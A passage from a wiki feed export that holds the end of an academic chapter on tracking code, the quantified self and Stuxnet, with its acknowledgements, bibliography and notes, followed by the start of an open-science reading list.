Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4704</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4704"/>
		<updated>2012-04-18T14:04:31Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
